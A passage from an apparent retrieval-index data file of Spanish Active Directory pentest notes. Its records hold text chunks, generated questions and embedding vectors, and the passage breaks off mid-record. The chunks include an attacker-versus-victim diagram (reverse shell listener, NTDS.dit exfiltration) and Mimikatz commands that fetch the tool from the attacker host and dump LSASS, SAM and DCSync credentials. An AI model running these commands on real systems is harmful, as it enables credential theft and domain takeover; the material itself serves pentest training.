β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con quΓ© programa puedo extraer contraseΓ±as y hashes de memoria en un sistema Windows?", "v": [0.11965, 0.04181, -0.05479, -0.16678, 0.00105, -0.05096, -0.05402, -0.09641, -0.10303, -0.09042, -0.07388, 0.05634, -0.03766, -0.07676, 0.01565, 0.04518, 0.1435, -0.00528, -0.00191, 0.04854, -0.05905, -0.07507, -0.12957, 0.04804, -0.04898, -0.00187, -0.02909, 0.07087, -0.14009, 0.02014, -0.00343, 0.00609, 0.04896, -0.04752, -0.05516, 0.18693, 0.00016, 0.13482, 0.07534, 0.04201, 0.09439, 0.11523, -0.0573, 0.10231, 0.07415, -0.09399, 0.05602, -0.00411, 0.12356, -0.11813, -0.05457, -0.04006, -0.06301, -0.05881, 0.12821, -0.13532, 0.04152, -0.02109, -0.07457, 0.02359, -0.03051, 0.14101, 0.02674, 0.03257, 0.01511, -0.036, 0.09638, 0.00349, -0.07218, 0.19476, -0.08166, 0.00815, 0.07416, 0.0161, 0.02874, 0.07469, 0.00774, -0.05097, 0.06347, 0.05597, -0.0791, -0.01816, 0.04509, -0.01957, -0.03896, 0.01378, 0.00399, -0.03179, 0.02768, -0.0797, 0.08663, -0.01635, -0.01412, 0.1708, 0.09079, -0.07385, 0.05462, 0.08801, -0.03787, 0.06122, -0.03919, -0.05768, -0.073, 0.23114, -0.04725, 0.02607, 0.03791, -0.01194, -0.0127, -0.06849, 0.03136, 0.00487, -0.0649, -0.03991, -0.12752, 0.00793, 0.03144, 0.00637, 0.02897, 0.03368, -0.0849, -0.01678, 0.00118, 0.0063, 0.10183, -0.00401, -0.05799, 0.11575, -0.10733, -0.01698, 0.06318, 0.07439, -0.04857, -0.05981, -0.02172, 0.04758, 0.02222, 0.02022, 0.01101, -0.0568, 0.04063, 0.05102, 0.03451, -0.01009, 8e-05, 0.05831, 0.08745, 0.04776, -0.03866, -0.04545, 0.02559, 0.00128, 0.03454, 0.00865, -0.06157, 0.01388, 0.01242, -0.02423, -0.06923, 0.05547, -0.07776, -0.01908, -0.04361, -0.01556, 0.00193, -0.01138, -0.04063, 0.05466, 0.08698, 0.05408, -0.01017, 0.00501, 0.03768, -0.06684, 0.00078, 0.00633, -0.0041, -0.09743, 0.02099, -0.02749, -0.12, 0.02409, 0.03119, -0.00898, -0.04564, -0.06652, 0.00526, 0.07165, -0.01472, -0.03232, 0.00964, 0.00327, 0.02754, 0.02592, 0.00043, -0.02794, -0.0411, -0.02057, 0.04915, -0.00603, -0.05521, 0.0765, 0.01122, -0.04376, 0.05714, 0.11738, -0.05304, -0.00468, 0.04688, 0.07177, 0.01799, 0.01031, 0.00617, -0.02561, -0.10735, -0.01704, -0.03149, 0.04266, -0.00355, -0.04671, 0.034, 0.03311, 0.08933, 0.07522, -0.06169, -0.08363, -0.02879, 0.0935, 0.00179, -0.02872, -0.01872, -0.01368, -0.02287, 0.00135, 0.05619, -0.01617, -0.07991, -0.05724, -0.02403, -0.03695, -0.04602, 0.05941, -0.02596, -0.07314, -0.08188, -0.03504, -0.02212, 0.03503, 0.03869, -0.06478, -0.05347, 0.03689, 0.01998, -0.03991, -0.00644, 0.0308]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "quΓ© herramienta me sirve para visualizar el mapa de permisos y relaciones de usuarios en Active Directory?", "v": [-0.01373, 0.16666, -0.10706, -0.28962, 0.01307, -0.11203, -0.14767, -0.08922, -0.04935, -0.07024, 0.06115, -0.10216, 0.05321, -0.11645, 0.11967, -0.02968, 0.18675, -0.03865, 0.00905, -0.03026, 0.0513, 0.01004, -0.10206, 0.08397, -0.10775, 0.04063, 0.05602, -0.10173, -0.11213, 0.01834, 0.04226, 0.02546, -0.00804, -0.03721, -0.01499, -0.03274, -0.01181, 0.04872, 0.03318, -0.01512, -0.06604, -0.00873, -0.08501, 0.02876, 0.03163, 0.06319, -0.11439, -0.08019, -0.03076, 0.11479, -0.12639, -0.14932, -0.1371, -0.02532, 0.03689, -0.0696, 0.14743, -0.11021, 0.04247, -0.11411, -0.13816, -0.09605, -0.02425, -0.03564, -0.06368, -0.0564, 0.15818, -0.0025, -0.10866, 0.10442, -0.07314, 0.05876, 0.04567, 0.04496, 0.0288, -0.00977, -0.00174, 0.00579, -0.08558, 0.01947, 0.14803, -0.00149, -0.09924, -0.03905, -0.07733, -0.09384, 0.04623, -0.04974, 0.05085, -0.0535, 0.06247, 0.14493, -0.03734, -0.01877, 0.03532, -0.02048, -0.01755, 0.01422, 0.01425, 0.01523, 0.12874, -0.03225, -0.03418, 0.114, -0.06515, 0.04438, 0.00801, -0.00445, -0.08037, 0.09676, 0.05097, -0.00146, 0.01286, -0.02025, 0.02766, 0.10372, -0.0794, -0.09033, -0.03659, -0.04423, -0.03572, -0.0189, 0.03254, 0.01904, -0.01882, 0.03655, -0.01802, 0.09212, -0.01568, -0.02478, 0.01256, -0.007, -0.04235, -0.02808, 0.00525, -0.03756, -0.00287, -0.01535, -0.03769, -0.07215, -0.02729, 0.02321, 0.02023, -0.04254, 0.00187, 0.04201, 0.04341, 0.00665, -0.03017, -0.0273, 0.0124, -0.031, -0.04888, 0.0265, 0.03868, 0.02663, -0.09553, -0.02794, -0.08297, 0.02223, 0.0126, -0.01773, 0.04068, 0.04686, 0.05512, -0.02988, -0.07089, -0.01767, 0.07022, 0.08906, 0.01895, 0.04387, 0.05062, -0.09769, 0.02337, -0.06235, 0.01886, 0.00193, -0.02274, -0.02595, 0.00406, -0.0435, -0.02975, 0.00124, -0.02491, -0.01842, -0.0035, -0.03512, 0.04789, 0.00945, -0.02903, 0.11186, 0.03588, -0.06148, 0.03303, -0.05385, 0.01016, -0.00729, -0.01631, -0.07189, 0.05946, -0.04606, 0.03947, -0.04088, 0.03132, 0.02083, 0.00258, 0.03551, 0.04252, -0.02831, -0.01927, -0.0185, 0.05153, -0.0173, -0.06438, -0.01804, 0.03099, 0.04049, 0.01902, -0.04331, 0.02481, -0.00188, 0.03592, -0.04712, 0.08381, 0.02461, 0.0308, -0.03532, 0.00104, 0.01558, 0.00844, -0.03837, -0.00287, -0.04046, 0.04441, -0.0579, 0.03959, -0.06077, -0.02481, -0.04989, 0.02437, 0.03269, 0.04701, 0.008, -0.09963, -0.04047, 0.02917, -0.01693, -0.05694, -0.07656, -0.0195, 0.00573, 0.07683, -0.00411, 0.0038, -0.00301]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ TU KALI/DEBIAN β”‚ β”‚ VICTIMA WINDOWS β”‚\n β”‚ (la atacante) β”‚ β”‚ (cliente o servidor) β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€ β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€\n β”‚ β”‚ β”‚ β”‚\n β”‚ β”Œβ”€ Impacket ─────────────┐ β”‚ β”‚ β”Œβ”€ Procesos a saquear ─┐ β”‚\n β”‚ β”‚ secretsdump (hashes) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ LSASS (creds en RAM) β”‚ β”‚\n β”‚ β”‚ psexec (shell) β”œβ”€β”€β”Όβ”€SMB─┼─── NTDS.dit (BD usuarios)β”‚ β”‚\n β”‚ β”‚ GetUserSPNs (kerb) β”œβ”€β”€β”Όβ”€β”€β”€β”€β”€β”Όβ”€β”€β”€ SAM/SYSTEM β”‚ β”‚\n β”‚ β”‚ getTGT (kerb) β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β”‚ β”‚ β”‚ β”Œβ”€ Lo que SUBES tΓΊ ────┐ β”‚\n β”‚ β”Œβ”€ BloodHound ───────────┐ β”‚ β”‚ β”‚ mimikatz.exe β”‚ β”‚\n β”‚ β”‚ sharphound (recolecta) β”œβ”€β”€β”Όβ”€LDAP┼─── winPEAS β”‚ β”‚\n β”‚ β”‚ neo4j + GUI (visualiza)β”‚ β”‚ β”‚ β”‚ Invoke-ConPtyShell.ps1β”‚ β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚ Invoke-PowerShellTcp β”‚ β”‚\n β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚\n β”‚ β”Œβ”€ Listener / loot ──────┐ β”‚ β”‚ β”‚\n β”‚ β”‚ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell β”‚\n β”‚ β”‚ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools β”‚\n β”‚ β”‚ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. β”‚\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”‚\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual es una alternativa libre a mimikatz para ejecutar comandos internos de PowerShell?", "v": [0.13157, 0.00403, -0.0519, -0.00592, -0.06154, -0.01042, -0.10004, -0.02835, -0.0998, -0.10201, -0.05707, 0.09529, 0.10593, -0.00071, 0.07524, 0.04669, 0.19166, 0.00739, -0.00794, -0.01792, 0.00448, -0.03929, -0.05428, -0.09024, -0.01635, 0.05672, 0.00871, 0.11667, -0.17093, -0.07822, -0.07115, -0.01644, 0.07976, -0.11174, -0.00302, 0.11782, -0.04089, 0.06174, 0.13135, 0.18402, -0.1343, 0.12016, -0.17835, 0.04822, 0.00121, -0.07428, 0.02904, -0.01541, 0.05927, 0.02411, -0.0631, -0.04529, -0.04862, 0.01253, 0.03476, -0.14245, 0.12116, -0.1113, -0.10123, -0.02695, -0.08818, -0.00274, 0.00406, 0.09613, -0.0281, 0.01225, -0.07626, -0.15466, -0.03405, 0.15233, -0.09808, -0.01113, -0.02752, -0.02023, 0.002, -0.00714, -0.08197, -0.06371, 0.04342, 0.00179, -0.0677, -0.04416, -0.10657, 0.08575, -0.05003, -0.06281, -0.03473, -0.13993, -0.03892, 0.04442, 0.06408, -0.00436, 0.00795, 0.10182, 0.01031, -0.00656, -0.08247, 0.06043, -0.00168, 0.02993, 0.03933, -0.03729, -0.19023, 0.05013, 0.01884, 0.04058, -0.03338, -0.02084, 0.03808, 0.01131, -0.00559, -0.05771, 0.01482, -0.02677, -0.03785, -0.00141, -0.00062, -0.0563, -0.01059, -0.07321, -0.10842, 0.06982, -0.02024, -0.00669, -0.0286, -0.00635, 0.01676, -0.03578, 0.04529, 0.03183, 0.03308, -0.06445, 0.1082, -0.11813, -0.05751, 0.03001, 0.07756, -0.04733, -0.06388, -0.12459, -0.00465, -0.00411, 0.02781, -0.00598, 0.08446, -0.03723, 0.01692, -0.083, -0.00304, 0.0406, 0.02195, 0.07677, -0.02151, 0.0725, 0.00804, -0.04466, -0.08175, -0.0071, -0.05916, 0.06698, 0.05553, -0.02813, -0.0031, 0.03063, 0.0109, -0.03236, -0.1146, -0.05413, -0.05853, -0.0047, 0.03512, 0.05435, 0.0658, 0.02113, 0.06314, -0.02323, -0.06996, -0.01985, 0.03364, -0.02323, 0.01681, 0.05651, -0.05342, -0.05077, 0.00337, -0.03569, -0.00916, 0.00944, -0.01556, -0.00367, -0.05437, -0.01339, -0.03698, -0.11368, 0.01302, -0.04781, 0.08585, -0.05279, -0.08585, -0.05418, -0.03765, -0.00203, 0.00725, -0.0305, 0.02209, 0.03537, -0.00853, 0.06272, -0.01211, -0.0008, 0.11349, 0.02817, 0.14877, 0.04914, -0.03395, -0.0007, -0.02054, -0.05681, 0.00807, -0.01793, 0.00181, 0.0208, 0.08097, 0.00776, 0.0212, 0.03809, -0.00863, 0.01035, -0.02501, 0.063, 0.00917, 0.00608, 0.00082, -0.02531, 0.04098, -0.02033, 0.00537, 0.03241, 0.03279, -0.03871, 0.02408, 0.04012, -0.01907, -0.03359, -0.03606, 0.00155, -0.13669, 0.0105, -0.0282, -0.02518, 0.03173, -0.00203, -0.00164, -0.00469, -0.00964, -0.06613]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "**Idea clave**: tΓΊ no tienes \"GUI\" central. Cada herramienta es **independiente** y se comunica por **red** con la vΓ­ctima. Tu Kali es un puesto de mando con muchos terminales abiertos a la vez.\n\n---", "indexar": "ΒΏQuΓ© programa puedo usar para gestionar mΓΊltiples herramientas de seguridad simultΓ‘neamente?", "v": [0.00223, 0.15557, -0.09747, -0.23631, -0.01821, -0.0823, -0.1231, -0.08941, -0.07784, -0.09861, -0.13556, -0.02723, 0.02807, -0.06534, 0.01446, 0.07687, 0.01963, -0.14827, -0.03421, 0.03111, 0.03512, -0.03358, -0.03065, -0.0531, -0.1064, 0.0403, 0.11374, -0.05267, -0.14737, -0.02997, -0.0168, 0.04084, 0.09051, -0.12854, -0.0515, -0.0294, -0.0105, 0.08601, 0.05135, 0.00641, -0.01181, 0.009, -0.09195, -0.02405, 0.1856, 0.01383, 0.03594, -0.05779, -0.00335, 0.00302, -0.0935, -0.07279, -0.04115, -0.06877, 0.09626, -0.10738, 0.09679, -0.15021, -0.04336, -0.0395, -0.1052, 0.0186, -0.023, 0.05568, -0.02837, -0.0951, 0.06533, -0.02653, -0.14638, 0.12406, -0.03525, 0.02142, 0.05371, 0.09913, -0.01687, -0.04183, 0.01082, 0.0135, 0.0846, 0.04471, -0.03102, 0.03766, 0.00255, 0.03552, -0.10438, -0.0968, 0.0315, -0.03659, -0.0654, -0.01195, 0.00549, 0.01502, 0.01531, -0.01064, 0.08509, -0.00508, 0.0592, 0.02446, -0.03282, 0.02235, 0.08715, -0.05265, -0.04303, 0.10696, -0.0895, 0.05467, -0.00689, 0.01189, -0.04045, -0.04605, -0.07973, 0.00962, -0.0592, -0.01825, -0.07039, 0.06693, -0.03272, -0.13929, 0.09719, -0.05308, -0.0511, 0.01631, 0.02305, -0.00878, 0.20419, -0.01849, 0.00428, 0.1309, -0.01426, 0.01114, -0.0195, -0.04189, -0.06226, -0.06517, -0.05547, 0.00012, 0.01047, -0.13358, -0.03643, -0.11035, -0.01476, 0.07724, -0.02387, -0.06845, 0.05962, -0.014, -0.02134, -0.07613, -0.00796, 0.04181, 0.03675, -0.04284, -0.01352, 0.01586, -0.04841, -0.02643, -0.03591, -0.04361, -0.11678, 0.0114, -0.06384, 0.00405, 0.04487, 0.01961, 0.04769, -0.03284, 0.05619, 0.02311, 0.0601, 0.04045, 0.04282, 0.11196, 0.08273, -0.02851, -0.02212, -0.04808, -0.02021, -0.11419, 0.0196, -0.05302, -0.03502, 0.01424, -0.00467, 0.04004, 0.03125, -0.07641, 0.00815, 0.06784, -0.01487, 0.06761, -0.00961, 0.04, -0.02044, -0.06592, 0.03693, -0.04714, 0.01424, -0.05452, -0.00119, -0.03553, -0.02923, 0.03234, -0.01239, -0.04601, 0.09771, 0.1017, -0.06743, 0.03068, 0.06423, 0.0399, 0.01874, -0.02932, 0.11, -0.02672, -0.04483, -0.04318, -0.03593, 0.02733, 0.00802, -0.0306, 0.01597, -0.00499, 0.02783, 0.03451, -0.01058, -0.07277, 0.01434, 0.03187, 0.06299, 0.04599, 0.00091, 0.01904, -0.02728, 0.01016, 0.02179, -0.06812, 0.04063, -0.03085, -0.00077, -0.03307, -0.01139, 0.08553, 0.00828, -0.01389, -0.08799, 0.00804, -0.07875, 0.01807, -0.00798, -0.04362, -0.02848, 0.02877, 0.00457, -0.0498, -0.02739, 0.00246]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "**Idea clave**: tΓΊ no tienes \"GUI\" central. Cada herramienta es **independiente** y se comunica por **red** con la vΓ­ctima. Tu Kali es un puesto de mando con muchos terminales abiertos a la vez.\n\n---", "indexar": "ΒΏCon quΓ© puedo coordinar varios terminales independientes como un sistema centralizado?", "v": [0.22305, 0.14366, -0.05876, 0.0321, 0.0778, -0.11994, 0.06847, 0.00187, -0.15773, -0.05263, -0.13502, 0.07498, -0.03054, -0.0521, 0.10161, 0.03925, -0.01971, -0.12218, 0.02994, -0.09945, -0.03546, -0.15402, 0.01133, 0.00235, 0.0216, -0.03371, 0.01588, -0.12042, -0.07215, -0.10786, 0.08938, -0.00182, 0.19289, 0.00044, -0.04228, -0.01902, -0.08779, 0.14037, -0.03616, -0.04308, 0.06904, 0.00403, -0.07233, 0.01003, 0.19268, -0.00618, -0.0127, -0.00321, 0.03117, -0.09601, -0.1145, -0.04017, -0.12168, -0.03905, 0.02448, -0.08703, 0.10566, 0.06309, 0.06868, -0.0435, 0.00353, 0.10564, 0.11943, 0.06198, 0.05624, 0.0357, -0.04133, -0.07094, -0.06433, 0.0562, -0.04295, 0.05498, 0.03319, 0.00805, 0.09362, 0.12932, -0.04544, 0.00141, 0.11732, 0.01807, 0.05051, -0.02917, -0.02324, 0.02917, -0.01876, -0.08328, -0.00537, -0.00055, -0.05514, 0.00022, 0.10408, -0.03034, -0.01429, 0.04204, -0.01612, -0.0026, 0.01462, 0.0308, -0.04209, 0.05071, 0.05873, 0.03461, -0.08167, 0.1289, -0.04173, -0.01884, 0.10934, -0.07368, 0.07751, -0.0888, -0.0522, 0.00547, 0.05409, -0.04636, -0.11979, 0.01664, -0.00442, 0.07851, 0.02585, -0.01237, -0.02987, -0.01028, 0.03836, -0.07987, 0.10167, -0.01741, -0.00958, 0.09092, 0.07354, 0.06459, 0.0449, 0.01617, -0.00262, 0.0147, -0.02379, 0.05386, 0.02929, -0.01162, 0.01245, 0.02169, -0.03534, 0.04822, 0.05424, -0.09265, 0.1394, 0.03801, 0.05354, -0.05712, -0.03954, -0.03922, -0.01032, -0.00513, -0.03124, 0.00767, -0.04963, -0.00039, 0.00811, -0.09468, -0.03777, 0.07069, -0.03158, -0.00823, -0.08577, -0.01225, 0.02015, 0.023, -0.06454, -0.0325, 0.03969, 0.0089, -0.01253, 0.01026, -0.01072, -0.06605, 0.01282, -0.07093, -0.00974, -0.06422, 0.04788, 0.00455, -0.03407, 0.07358, -0.04123, -0.04707, 0.03121, 0.05145, -0.10389, -0.00079, 0.07832, 0.01232, 0.02722, 0.07049, 0.0184, 0.00351, 0.01087, -0.06312, -0.07227, -0.05605, -0.00271, -0.00316, -0.06744, 0.07753, 0.06973, -0.06209, 0.0094, 0.0313, -0.07981, 0.07625, 0.00877, 0.11208, -0.0201, -0.0226, 0.09452, -0.005, -0.058, -0.01675, -0.03208, 0.00221, -0.04954, -0.02007, 0.03694, 0.0023, 0.04267, -0.00082, 0.0444, 0.04448, 0.03647, 0.08548, 0.03194, 0.03665, -0.03447, -0.00396, 0.01966, -0.05655, 0.0507, 0.0406, 0.03612, -0.03833, -0.03861, -0.06059, 0.02924, 0.07227, -0.00041, -0.0119, -0.03973, -0.10821, -0.08652, 0.0094, -0.01239, -0.06996, -0.01532, 0.06002, 0.03705, -0.01892, -0.01082, -0.06177]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "que programa se ejecuta dentro de Windows para leer credenciales en memoria?", "v": [-0.02944, 0.06235, -0.06886, -0.09991, 0.11218, -0.02352, -0.00047, 0.06792, -0.05697, -0.17077, -0.0993, 0.05905, -0.00788, -0.09112, 